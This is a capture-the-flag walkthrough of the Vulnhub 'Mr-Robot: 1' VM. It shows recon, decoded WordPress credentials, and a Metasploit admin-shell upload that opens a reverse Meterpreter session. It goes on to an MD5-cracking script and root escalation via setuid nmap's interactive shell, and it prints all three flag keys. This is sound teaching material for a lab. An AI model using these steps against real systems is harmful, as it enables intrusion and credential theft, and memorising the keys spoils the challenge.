CTF 1 - Vulnhub "Mr-Robot: 1" walkthrough


This is my first writeup for a Vulnhub CTF and my first complete CTF project with documentation. Please note that it took me days to complete this, with a lot of research on the internet.

Although Jason said this was beginner level, it sure challenged me and helped me get more comfortable with my skills.

Now, let the fun begin!

We start with nmap to see which ports and services are running and could be exploited.

[Screenshot: nmap -sV 192.168.2.41 -p- (Nmap 7.25BETA2, 2016-11-07). Host is up; not shown: 65532 filtered ports. 22/tcp closed ssh; 80/tcp open http Apache httpd; 443/tcp open ssl/http Apache httpd. Scan finished in 118.48 seconds.]

There, so we have ports 80 and 443 hosting web pages. Time to find out more.

Going to the webpage we find this message from Mr Robot, the TV series:

There is nothing here except some photos and videos from Mr Robot, the TV show (if you're a fan of the show you will get a kick out of the memes and videos).

[Screenshot: the landing page's terminal-style message from <mr.robot>, beginning "Hello friend. If you've come, you've come for a reason..." and ending "Soon I will give you a voice. Today your education begins.", followed by a menu of commands: prepare, fsociety, inform, question, wakeup.]

Now I moved on to Nikto to really find out what's going on with this website.

[Screenshot: nikto -h 192.168.2.41 (Nikto v2.1.6, target port 80, server Apache, start 2016-11-07). Findings: the X-XSS-Protection header is not defined; the X-Content-Type-Options header is not set; X-Powered-By: PHP/5.5.29; no CGI directories found; server leaks inodes via ETags (header found with file /robots.txt); uncommon header tcn found with contents list; Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names (alternatives for 'index': index.html, index.php); OSVDB-3092: /admin/: this might be interesting; uncommon header link found with contents <http://192.168.2.41/?p=23>; rel=shortlink.]

So, here I wasted time trying to log into the WordPress site. I couldn't figure out the password, so I decided to look at the robots.txt file found by Nikto.

Andddddd… Boom!

[Screenshot: http://192.168.2.41/robots.txt lists User-agent: * followed by two entries, fsocity.dic and key-1-of-3.txt.]


A quick check of the key-1-of-3.txt file reveals our first key: key-1-of-3.txt = 073403c8a58a1f80d943455fb30724b9


[Screenshot: http://192.168.2.41/key-1-of-3.txt displays 073403c8a58a1f80d943455fb30724b9.]


The .dic file has a lot of duplicates, so it needs to be cleaned. But after some time I decided to go for the old WordPress default readme.html, and sure enough, there is something there:

[Screenshot: /readme.html, the stock WordPress readme, headed "Version 4.3.6, Semantic Personal Publishing Platform", with the "First Things First" welcome text signed by Matt Mullenweg.]

Now we know the version is 4.3.6.


Now I needed to download the dictionary file and clean it up.

[Screenshot: wget http://192.168.2.41/fsocity.dic on 2016-11-07: HTTP request sent, awaiting response... 200 OK, length 7245381 (6.9M) [text/x-c], saved as 'fsocity.dic' in 0.6s at 11.7 MB/s.]


Now it's time to brute-force the directories on this site with wfuzz.

We get:

[Screenshot: wfuzz directory brute-force output, listing the response code and line/word/char counts for each matched word; license is among the 200 responses.]

Nikto above also found a license.txt file. Looking further at that, we get this insult:


[Screenshot: http://192.168.2.41/license reads: "what you do just pull code from Rapid9 or some... since when did you become a script kitty?"]

We scroll all the way down this page and we find this base64 string:

ZWxsaW90OkVSMjgtMDY1Mgo=

We decode this base64 online at https://www.base64decode.org/ and get this result:

elliot:ER28-0652

Bam!! Now we have some credentials to work with. From the Nikto results above, we know the WordPress login URL is /wp-admin, so we go there and log in.


[Screenshot: the WordPress dashboard, logged in as Elliot Alderson. "At a Glance" shows WordPress 4.3.6 running the Twenty Fifteen theme, with a notice that WordPress 4.6.1 is available.]


Here, I chose to upload an admin shell, now that I know these credentials work. Metasploit will get this done fast.

[Screenshot: in msfconsole, with the wp_admin_shell_upload module selected: set USERNAME elliot, set PASSWORD ER28-0652, set RHOST 192.168.2.41, exploit.]

OK, this failed the first time because the module did not detect our WordPress site. Commenting out the failure line in the exploit (open it with

root@kali:~# gedit /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb)

seemed to fix the issue:

[Screenshot: wp_admin_shell_upload.rb open in gedit at the generate_plugin and exploit methods. The line fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? is the one commented out; it is followed by the wordpress_login(username, password) call and its Failure::NoAccess check.]

Now we are in!

[Screenshot: msf > use exploit/unix/webapp/wp_admin_shell_upload, then the same USERNAME, PASSWORD and RHOST settings. exploit starts a reverse TCP handler on 192.168.2.35:4444, authenticates with WordPress using elliot:ER28-0652, uploads and executes the payload at /wp-content/plugins/YbBWRQEmSW/0qrokYpoQA.php, sends the stage (33721 bytes) and opens Meterpreter session 1 (192.168.2.35:4444 -> 192.168.2.41:58126) on 2016-11-07, with warnings that 0qrokYpoQA.php and YbBWRQEmSW.php may require manual cleanup on the target.]

Poking around, let's see what we can find:

[Screenshot: meterpreter ls -la /home shows a single directory, robot (mode 40755/rwxr-xr-x). After cd robot, ls -la /home/robot shows key-2-of-3.txt (mode 100400/r--------, 33 bytes) and password.raw-md5 (mode 100644/rw-r--r--, 39 bytes), both last modified 2015-11-13.]

And we have an MD5 hash, c3fcd3d76192e4007dfb496cca67e13b, for the username robot.

[Screenshot: cat key-2-of-3.txt fails twice with "core_channel_open: Operation failed"; cat password.raw-md5 prints robot:c3fcd3d76192e4007dfb496cca67e13b.]

Using online crackers, we found the password is abcdefghijklmnopqrstuvwxyz. Stupid password, right? Well, we got it.
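As an added example (not part of the original walkthrough), the Python script below shows why robot's password fell so quickly: password.raw-md5 stores an unsalted MD5, so every wordlist candidate can be hashed and compared in microseconds. It also deduplicates the wordlist first, which is the cleanup the fsocity.dic file needed. The file contents and the wordlist are constructed stand-ins; the hash is the one from the screenshot.

```python
import hashlib

# Constructed stand-in for /home/robot/password.raw-md5 (user:hexdigest)
RAW_MD5_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed stand-in for fsocity.dic: the real file is mostly
# duplicates, which is why the walkthrough says it needs cleaning
WORDLIST = """password
elliot
abcdefghijklmnopqrstuvwxyz
password
fsociety
abcdefghijklmnopqrstuvwxyz
elliot
"""


def dedupe(words):
    """Drop blank and duplicate candidates, keeping first-seen order."""
    seen = set()
    out = []
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def parse_raw_md5(text):
    """Parse 'user:hexdigest' lines into {user: digest}."""
    creds = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.strip().split(":", 1)
            creds[user] = digest.lower()
    return creds


def crack_raw_md5(raw_md5_text, wordlist_text):
    """Return {user: password} for every unsalted MD5 that matches a wordlist entry."""
    targets = parse_raw_md5(raw_md5_text)
    found = {}
    for word in dedupe(wordlist_text.splitlines()):
        digest = hashlib.md5(word.encode()).hexdigest()
        for user, h in targets.items():
            if h == digest:
                found[user] = word
    return found


if __name__ == "__main__":
    print(crack_raw_md5(RAW_MD5_FILE, WORDLIST))
```

The hit is the RFC 1321 test vector: MD5 of the lowercase alphabet is c3fcd3d76192e4007dfb496cca67e13b, so a raw MD5 of such a value is a finding in itself.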

Now, let's get the coveted shell.

[Screenshot: python -c 'import pty; …' is used to get a proper tty, then su robot with password abcdefghijklmnopqrstuvwxyz.]

And we are in; here is the second key!

[Screenshot: as robot, ls -a lists key-2-of-3.txt and password.raw-md5; cat key-2-of-3.txt prints 822c73956184f694993bede3eb39f959.]

OK, now we need to find the 3rd key. The third key must be in the root directory, so we need to escalate privileges to root. (This was a learning curve for me. I took a break, went to bed and woke up at 5am to work on this.)

I didn't know what I was looking for till I remembered nmap! And nmap is running as root! Wow, so that's our way in.

From here I decided to log straight into the VM rather than via Kali, since I had robot's credentials from above, and run interactive nmap.

[Screenshot: nmap --interactive starts, prints its banner (the version is unreadable in the screenshot) and "Welcome to Interactive Mode -- press h <enter> for help", then the nmap> prompt.]

Look at this beauty! We love an interactive shell! And we got our 3rd key!

[Screenshot: at the nmap> prompt, !sh drops to a # (root) shell; whoami, then cd /root and ls -la, which lists .bash_history, .bashrc, .cache, .profile, firstboot_done and key-3-of-3.txt (33 bytes, owned by root); cat key-3-of-3.txt prints the third key.]
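The root cause of this escalation is an nmap binary with the setuid bit and root ownership. As an added, defensive example that is not from the original walkthrough, the Python audit below lists every setuid-root executable on a host so that an unexpected one (like nmap here) can be spotted and have the bit removed; the function names are mine.

```python
import os
import stat

# Pseudo-filesystems that are never worth walking for setuid audits
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def is_setuid_root(mode, uid):
    """True for a regular, executable file that runs as root (uid 0) via setuid."""
    return (stat.S_ISREG(mode)
            and bool(mode & stat.S_ISUID)
            and bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            and uid == 0)


def find_setuid_root(root="/"):
    """Walk the filesystem from root and return every setuid-root executable, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo-filesystems in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: symlinks are not regular files
            except OSError:
                continue
            if is_setuid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return sorted(hits)


def remediation(path):
    """Shell command that strips the setuid bit from an unexpected binary such as nmap."""
    return f"chmod u-s {path}"


if __name__ == "__main__":
    # Anything here that is not passwd/su/sudo-style plumbing deserves a look
    for hit in find_setuid_root("/"):
        print(hit, "->", remediation(hit))
```

Run it as root on the box and compare the list against the distribution's expected setuid set; nmap should not be on it.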


This was fun.

I like the show Mr Robot and it was fun completing this CTF. I enjoy these CTF challenges and I will be posting more solutions here.